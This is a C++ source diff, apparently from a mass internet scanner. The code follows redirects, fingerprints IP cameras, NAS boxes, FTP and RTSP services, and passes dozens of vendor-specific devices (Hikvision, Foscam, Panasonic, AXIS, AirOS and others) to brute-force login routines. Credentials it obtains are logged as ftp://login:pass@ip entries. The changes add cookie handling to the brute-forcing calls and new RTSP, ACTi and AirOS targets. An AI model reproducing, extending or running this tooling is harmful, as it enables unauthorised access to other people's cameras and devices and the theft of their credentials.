stt->doEmitionYellowFoundData("[Redirecting to -> " + QString(tIP.c_str()) + ":" + QString::number(port) +
- "]");
+ "/\">" + QString(tIP.c_str()) + "]");
}
con.nConnect(tIP.c_str(), port, &buffcpy);
@@ -2577,25 +2677,24 @@ bool equivRedirectHandler(std::string *buff, char* ip, int port, Lexems *counter
int portPos = location.find(":", 7);
if (-1 != portPos) {
- int portPosEnd = location.find("/ \n>\"'", portPos + 7);
+ int portPosEnd = location.find("/ \n>\"'", portPos);
if (-1 != portPosEnd) {
newPort = std::stoi(location.substr(portPos + 1, portPosEnd));
if (gDebugMode) {
stt->doEmitionYellowFoundData("[Redirecting to -> " + QString(location.c_str()) + ":" + QString::number(port) +
- "]");
+ "/\">" + QString(location.c_str()) + "]");
}
con.nConnect(location.c_str(), newPort, &buffcpy);
}
else {
- stt->doEmitionYellowFoundData(QString(ip) + ":" + QString(port) + " Redirector error -> " + QString(location.c_str()));
+ stt->doEmitionYellowFoundData(QString(ip) + " Redirector error -> " + QString(location.c_str()));
+ return "";
}
}
else {
if (gDebugMode) {
stt->doEmitionYellowFoundData("[Redirecting to -> " + QString(location.c_str()) + ":" + QString::number(port) +
- "]");
+ "/\">" + QString(location.c_str()) + "]");
}
con.nConnect(location.c_str(), port, &buffcpy);
}
@@ -2605,25 +2704,24 @@ bool equivRedirectHandler(std::string *buff, char* ip, int port, Lexems *counter
int portPos = location.find(":", 8);
if (-1 != portPos) {
- int portPosEnd = location.find("/ \n>\"'", portPos + 8);
+ int portPosEnd = location.find_first_of("/ \n>\"'", portPos);
if (-1 != portPosEnd) {
newPort = std::stoi(location.substr(portPos + 1, portPosEnd));
if (gDebugMode) {
stt->doEmitionYellowFoundData("[Redirecting to -> " + QString(location.c_str()) + ":" + QString::number(port) +
- "]");
+ "/\">" + QString(location.c_str()) + "]");
}
con.nConnect(location.c_str(), newPort, &buffcpy);
}
else {
- stt->doEmitionYellowFoundData(QString(ip) + ":" + QString(port) + " Redirector error -> " + QString(location.c_str()));
+ stt->doEmitionYellowFoundData(QString(ip) + " Redirector error -> " + QString(location.c_str()));
+ return "";
}
}
else {
if (gDebugMode) {
stt->doEmitionYellowFoundData("[Redirecting to -> " + QString(location.c_str()) + ":" + QString::number(port) +
- "]");
+ "/\">" + QString(location.c_str()) + "]");
}
con.nConnect(location.c_str(), 443, &buffcpy);
}
@@ -2632,20 +2730,25 @@ bool equivRedirectHandler(std::string *buff, char* ip, int port, Lexems *counter
std::string tIP = std::string(ip) + (location[0] == '/' ? "" : "/") + location;
if (gDebugMode) {
stt->doEmitionYellowFoundData("[Redirecting to -> " + QString(tIP.c_str()) + ":" + QString::number(port) +
- "]");
+ "/\">" + QString(tIP.c_str()) + "]");
}
con.nConnect(tIP.c_str(), port, &buffcpy);
}
++counter->iterationCount;
- equivRedirectHandler(&buffcpy, ip, newPort, counter);
+ const std::string &locationEquiv = equivRedirectHandler(&buffcpy, ip, newPort, counter);
- buff->clear();
- buff->assign(buffcpy);
+ if (locationEquiv.size() > 0) {
+ location = locationEquiv;
+ }
+
+ if (buffcpy.size() > 0) {
+ buff->clear();
+ buff->assign(buffcpy);
+ }
- return buff->size() > 0;
+ return location;
}
std::string getScriptField(std::string *buff) {
int pos1 = STRSTR((const std::string *)buff, "size()) {
- return false;
+ return "";
}
if (counter->iterationCount > 3) {
//stt->doEmitionFoundData(QString(ip) + ":" + QString::number(port) + " - infinite loop detected.");
- return false;
+ return "";
}
const std::string &buffcpy_ref = getScriptField(buff);
std::string buffcpy = buffcpy_ref;
int sz = buffcpy.size();
- if (sz > 500) return false;
+ if (sz > 500) return "";
int pos = STRSTR((const std::string *) &buffcpy, "location.href =");
if (-1 == pos) pos = STRSTR((const std::string *) &buffcpy, "location.href=");
if (-1 == pos) pos = STRSTR((const std::string *) &buffcpy, "location.replace");
if (-1 == pos) {
- return false;
+ return "";
}
int eqPos = buffcpy.find_first_of("=(", pos);
@@ -2719,7 +2822,7 @@ bool jsRedirectHandler(std::string *buff, char* ip, int port, Lexems *counter) {
std::string subRedirect = buffcpy.substr(spacePosFirst + 1, spacePosSecond - spacePosFirst - 1);
int quotePosFirst = subRedirect.find_first_of("\"'");
if (-1 == quotePosFirst) {
- return false;
+ return "";
}
int quotePosSecond = subRedirect.find_first_of("\"'", quotePosFirst + 1);
@@ -2761,19 +2864,24 @@ bool jsRedirectHandler(std::string *buff, char* ip, int port, Lexems *counter) {
Connector con;
if (gDebugMode) {
stt->doEmitionYellowFoundData("[Redirecting to -> " + QString(location.c_str()) + ":" + QString::number(port) +
- "]");
+ "/\">" + QString(location.c_str()) + "]");
}
con.nConnect(location.c_str(), port, &buffcpy);
++counter->iterationCount;
- jsRedirectHandler(&buffcpy, ip, port, counter);
+ const std::string &locationJS = jsRedirectHandler(&buffcpy, ip, port, counter);
- buff->clear();
- buff->assign(buffcpy);
+ if (locationJS.size() > 0) {
+ location = locationJS;
+ }
- return buff->size() > 0;
+ if (buffcpy.size() > 0) {
+ buff->clear();
+ buff->assign(buffcpy);
+ }
+
+ return location;
}
std::string getHeader(const std::string *buffcpy, const int flag) {
if (STRSTR(buffcpy, "substr(0, 128);
}
+ else if (STRSTR(buffcpy, "camera") != -1 || STRSTR(buffcpy, "ipcam") != -1) {
+ result = "[Probably IPCamera] " + result;
+ }
return result;
}
}
#define RVI_START_FILE "\n\t\n\t\t"
-void parseFlag(int flag, char* ip, int port, int size, const std::string &header, char* cp) {
+void parseFlag(int flag, char* ip, char *ipRaw, int port, std::string *buff, const std::string &header, char* cp) {
+ int size = buff->size();
//Streaming server?
if (size > 180000) {
putInFile(flag, ip, port, size, "[Overflow]", cp);
@@ -2829,7 +2941,7 @@ void parseFlag(int flag, char* ip, int port, int size, const std::string &header
}
//Auth
else if (flag == 2) {
- _specBrute(ip, port, header.c_str(), flag, "/", "", cp, size);
+ _specBrute(ip, port, header.c_str(), flag, "", "", cp, size, true, true);
}
//FTP
else if (flag == 3) {
@@ -2848,7 +2960,7 @@ void parseFlag(int flag, char* ip, int port, int size, const std::string &header
sprintf(logEmit, "[FTP]:ftp://%s:%s@%s (F:%d)",
lps.login, lps.pass, ip, lps.login, lps.pass, ip, ps.directoryCount);
- fputsf(log, flag, "FTP");
+ fputsf(log, flag);
fillGlobalLogData(ip, port, std::to_string(size).c_str(), "[FTP service]", lps.login, lps.pass, "NULL", cp, "FTP");
@@ -2864,7 +2976,7 @@ void parseFlag(int flag, char* ip, int port, int size, const std::string &header
sprintf(logEmit, "[FTP]:ftp://%s:%s@%s [ROUTER]",
lps.login, lps.pass, ip, lps.login, lps.pass, ip, ip);
- fputsf(log, flag, "FTP");
+ fputsf(log, flag);
fillGlobalLogData(ip, port, std::to_string(size).c_str(), "[FTP service]", lps.login, lps.pass, "Router FTP.", cp, "FTP");
@@ -2873,20 +2985,24 @@ void parseFlag(int flag, char* ip, int port, int size, const std::string &header
else if (strstr(lps.login, "Unknown protocol") != NULL)
{
strcat(log, "; [!] USER/PASS commands failed. Dunno what to do.");
- fputsf(log, flag, "");
+ fputsf(log, flag);
stt->doEmitionFoundData(QString::fromLocal8Bit(log));
};
}
+
+ const std::string &cookieRef = Utils::getHeaderValue(buff, "Set-Cookie: ", "Cookie: ");
+ std::string cookie = cookieRef;
+
if (flag == 4 && HikVis::isInitialized)
{
HikVis hv;
lopaStr lps = hv.HVLobby(ip, port);
if (strstr(lps.login, "UNKNOWN") == NULL && strlen(lps.other) == 0)
{
- _specFillerBA(ip, port, "[Hikvision IVMS]", lps.login, lps.pass, 0);
- fillGlobalLogData(ip, port, std::to_string(size).c_str(), "[Hikvision IVMS] ()",
- lps.login, lps.pass, "[Hikvision IVMS]", "UTF-8", "Basic Authorization");
+ _specFillerCustom(ip, port, "[Hikvision IVMS]", lps.login, lps.pass, 0, "[SVC]");
+ //fillGlobalLogData(ip, port, std::to_string(size).c_str(), "[Hikvision IVMS] ()",
+ // lps.login, lps.pass, "[Hikvision IVMS]", "UTF-8", "Basic Authorization");
while (hikkaStop) Sleep(10);
hikkaStop = true;
@@ -2918,9 +3034,9 @@ void parseFlag(int flag, char* ip, int port, int size, const std::string &header
lopaStr lps = hv.RVILobby(ip, port);
if (strstr(lps.login, "UNKNOWN") == NULL && strlen(lps.other) == 0)
{
- _specFillerBA(ip, port, "[RVI]", lps.login, lps.pass, 0);
- fillGlobalLogData(ip, port, std::to_string(size).c_str(), "[RVI] ()",
- lps.login, lps.pass, "[RVI]", "UTF-8", "Basic Authorization");
+ _specFillerCustom(ip, port, "[RVI]", lps.login, lps.pass, 0, "[SVC]");
+ /*fillGlobalLogData(ip, port, std::to_string(size).c_str(), "[RVI] ()",
+ lps.login, lps.pass, "[RVI]", "UTF-8", "Basic Authorization");*/
while (rviStop) Sleep(10);
rviStop = true;
@@ -3008,11 +3124,11 @@ void parseFlag(int flag, char* ip, int port, int size, const std::string &header
}
else if (flag == 32) //IPC WEB ip cam
{
- _specWEBIPCAMBrute(ip, port, "[IPC] WEB IP Camera", flag, "WEB Authorization", cp, size, "IPC");
+ _specWEBIPCAMBrute(ip, port, "[IPC] WEB IP Camera", flag, "WEB Authorization", cp, size, "IPC", &cookie);
}
else if (flag == 33) //GEOvision ip cam
{
- _specWEBIPCAMBrute(ip, port, "[GEO] WEB IP Camera", flag, "WEB Authorization", cp, size, "GEO");
+ _specWEBIPCAMBrute(ip, port, "[GEO] WEB IP Camera", flag, "WEB Authorization", cp, size, "GEO", &cookie);
}
else if (flag == 34) //Hikvision ip cam
{
@@ -3022,11 +3138,11 @@ void parseFlag(int flag, char* ip, int port, int size, const std::string &header
}
else if (flag == 35) //EasyCam
{
- _specWEBIPCAMBrute(ip, port, "[EasyCam] WEB IP Camera", flag, "WEB Authorization", cp, size, "EasyCam");
+ _specWEBIPCAMBrute(ip, port, "[EasyCam] WEB IP Camera", flag, "WEB Authorization", cp, size, "EasyCam", &cookie);
}
else if (flag == 36) //Panasonic Cam
{
- _specBrute(ip, port, QString("[Panasonic] IP Camera (" + QString(ip) + ":" + QString::number(port) + ")").toLocal8Bit().data(), flag,
+ _specBrute(ip, port, QString("[Panasonic] IP Camera (" + QString(ip) + ")").toLocal8Bit().data(), flag,
"/config/index.cgi", "Basic Authorization", cp, size);
stt->doEmitionYellowFoundData("[PaCr]Panasonic IPCam, crawling started.");
@@ -3051,15 +3167,15 @@ void parseFlag(int flag, char* ip, int port, int size, const std::string &header
}
_specBrute(newIP.c_str(), nPort, QString("[Panasonic] IP Camera (" +
- QString(newIP.c_str()) + ":" + QString::number(nPort) + ")").toLocal8Bit().data(), flag,
+ QString(newIP.c_str()) + ")").toLocal8Bit().data(), flag,
(char*)newPath.c_str(), "Basic Authorization", cp, size);
}
}
else stt->doEmitionRedFoundData("[Panasonic Cam URL] Cannot extract data " +
- QString(ip) + ":" + QString::number(port));
+ QString(ip));
}
else stt->doEmitionRedFoundData("[Panasonic Cam cam_link] Cannot extract data " +
- QString(ip) + ":" + QString::number(port));
+ QString(ip));
}
}
else if (flag == 37) //Panasonic Cam
@@ -3068,7 +3184,7 @@ void parseFlag(int flag, char* ip, int port, int size, const std::string &header
}
else if (flag == 38) //Foscam
{
- _specWEBIPCAMBrute(ip, port, "[Foscam] IP Camera", flag, "Web Authorization", cp, size, "Foscam");
+ _specWEBIPCAMBrute(ip, port, "[Foscam] IP Camera", flag, "Web Authorization", cp, size, "Foscam", &cookie);
}
else if (flag == 39) //EagleEye
{
@@ -3080,7 +3196,7 @@ void parseFlag(int flag, char* ip, int port, int size, const std::string &header
}
else if (flag == 41) //AVIOSYS-camera
{
- _specWEBIPCAMBrute(ip, port, "[AVIOSYS] IP Camera", flag, "Web Authorization", cp, size, "AVIOSYS");
+ _specWEBIPCAMBrute(ip, port, "[AVIOSYS] IP Camera", flag, "Web Authorization", cp, size, "AVIOSYS", &cookie);
}
else if (flag == 42) //NW_camera
{
@@ -3100,19 +3216,19 @@ void parseFlag(int flag, char* ip, int port, int size, const std::string &header
}
else if (flag == 46) //Buffalo disk
{
- _specWEBIPCAMBrute(ip, port, "[Buffalo] Lan Disk", flag, "Web Authorization", cp, size, "BUFFALO");
+ _specWEBIPCAMBrute(ip, port, "[Buffalo] Lan Disk", flag, "Web Authorization", cp, size, "BUFFALO", &cookie);
}
else if (flag == 47) //Digital Video Server
{
- _specWEBIPCAMBrute(ip, port, "[DVS] Camera", flag, "Web Authorization", cp, size, "DVS");
+ _specWEBIPCAMBrute(ip, port, "[DVS] Camera", flag, "Web Authorization", cp, size, "DVS", &cookie);
}
else if (flag == 48) //ipCAM
{
- _specWEBIPCAMBrute(ip, port, "[ipCAM] Camera", flag, "Web Authorization", cp, size, "IPCAM");
+ _specWEBIPCAMBrute(ip, port, "[ipCAM] Camera", flag, "Web Authorization", cp, size, "IPCAM", &cookie);
}
else if (flag == 49) //IEORFOREFOX
{
- _specWEBIPCAMBrute(ip, port, "[IEORFOREFOX] Camera", flag, "Web Authorization", cp, size, "IEORFOREFOX");
+ _specWEBIPCAMBrute(ip, port, "[IEORFOREFOX] Camera", flag, "Web Authorization", cp, size, "IEORFOREFOX", &cookie);
}
else if (flag == 50) //IP Camera
{
@@ -3120,19 +3236,19 @@ void parseFlag(int flag, char* ip, int port, int size, const std::string &header
}
else if (flag == 51) //MASPRO
{
- _specWEBIPCAMBrute(ip, port, "[MASPRO] WEB IP Camera", flag, "WEB Authorization", cp, size, "MASPRO");
+ _specWEBIPCAMBrute(ip, port, "[MASPRO] WEB IP Camera", flag, "WEB Authorization", cp, size, "MASPRO", &cookie);
}
else if (flag == 52) //webcamxp5
{
- _specWEBIPCAMBrute(ip, port, "[WEBCAMXP] WEB IP Camera", flag, "WEB Authorization", cp, size, "WEBCAMXP");
+ _specWEBIPCAMBrute(ip, port, "[WEBCAMXP] WEB IP Camera", flag, "WEB Authorization", cp, size, "WEBCAMXP", &cookie);
}
else if (flag == 53) //Jassun
{
- _specWEBIPCAMBrute(ip, port, "[JASSUN] WEB IP Camera", flag, "WEB Authorization", cp, size, "JASSUN");
+ _specWEBIPCAMBrute(ip, port, "[JASSUN] WEB IP Camera", flag, "WEB Authorization", cp, size, "JASSUN", &cookie);
}
else if (flag == 54) //Beward
{
- _specWEBIPCAMBrute(ip, port, "[BEWARD] WEB IP Camera", flag, "WEB Authorization", cp, size, "BEWARD");
+ _specWEBIPCAMBrute(ip, port, "[BEWARD] WEB IP Camera", flag, "WEB Authorization", cp, size, "BEWARD", &cookie);
}
else if (flag == 55) //QCam
{
@@ -3144,12 +3260,30 @@ void parseFlag(int flag, char* ip, int port, int size, const std::string &header
}
else if (flag == 57) //Juan
{
- _specWEBIPCAMBrute(ip, port, "[JUAN] WEB IP Camera", flag, "WEB Authorization", cp, size, "JUAN");
+ _specWEBIPCAMBrute(ip, port, "[JUAN] WEB IP Camera", flag, "WEB Authorization", cp, size, "JUAN", &cookie);
}
else if (flag == 58) //QLikView
{
+ stt->doEmitionRedFoundData("QLikView found. " + QString(ip));
_specBrute(ip, port, "[QLikView] IP Camera", flag, "/QvAJAXZfc/Authenticate.aspx?_=1453661324640", "Basic Authorization", cp, size);
}
+ else if (flag == 59) //RTSP
+ {
+ //char newIP[128] = {0};
+ //strcpy(newIP, "rtsp://");
+ //strncat(newIP, ipRaw, 96);
+ //strcat(newIP, "/");
+ _specRTSPBrute(ipRaw, port, header.c_str(), flag, "RTSP", cp, size);
+ }
+ else if (flag == 60) //ACTi
+ {
+ _specWEBIPCAMBrute(ip, port, "[ACTi] WEB IP Camera", flag, "WEB Authorization", cp, size, "ACTi", &cookie);
+ }
+ else if (flag == 61) //AirOS
+ {
+ _specWEBIPCAMBrute(ip, port, "[AirOS] WEB IP Camera", flag, "WEB Authorization", cp, size, "AirOS", &cookie);
+ }
+
else if (flag == 20) //AXIS Camera
{
if (_specBrute(ip, port, "AXIS Camera", flag, "/mjpg/video.mjpg", "Basic Authorization", cp, size) == -1) {
@@ -3191,12 +3325,12 @@ void parseFlag(int flag, char* ip, int port, int size, const std::string &header
char log[512] = { 0 };
++PieCamerasC1;
++camerasC1;
- const lopaStr &lps = BA::BALobby((string(ip) + "/~login").c_str(), port);
+ const lopaStr &lps = BA::BALobby((string(ip) + "/~login").c_str(), port, false);
sprintf(log, "[HFS]:%s:%d T: %s Pass: %s:%s",
ip, port, ip, port, header.c_str(), lps.login, lps.pass);
fillGlobalLogData(ip, port, std::to_string(size).c_str(), header.c_str(), lps.login, lps.pass, "HFS-FTP", cp, "Basic Authorization");
- fputsf(log, flag, "HFS");
+ fputsf(log, flag);
stt->doEmitionFoundData(QString::fromLocal8Bit(log));
}
//else if (flag == 1)
@@ -3220,15 +3354,27 @@ void parseFlag(int flag, char* ip, int port, int size, const std::string &header
// putInFile(flag, ip, port, size, finalstr, cp);
//};
}
-void handleRedirects(std::string *buffcpy, char* ip, int port) {
-
+std::string handleRedirects(std::string *buffcpy, char* ip, int port) {
Lexems counter;
counter.iterationCount = 0;
- equivRedirectHandler(buffcpy, ip, port, &counter);
+ std::string location = std::string(ip);
+ const std::string &locationEquiv = equivRedirectHandler(buffcpy, ip, port, &counter);
+ location += locationEquiv;
+
counter.iterationCount = 0;
- jsRedirectHandler(buffcpy, ip, port, &counter);
+ if (Utils::ustrstr((const std::string *) buffcpy, "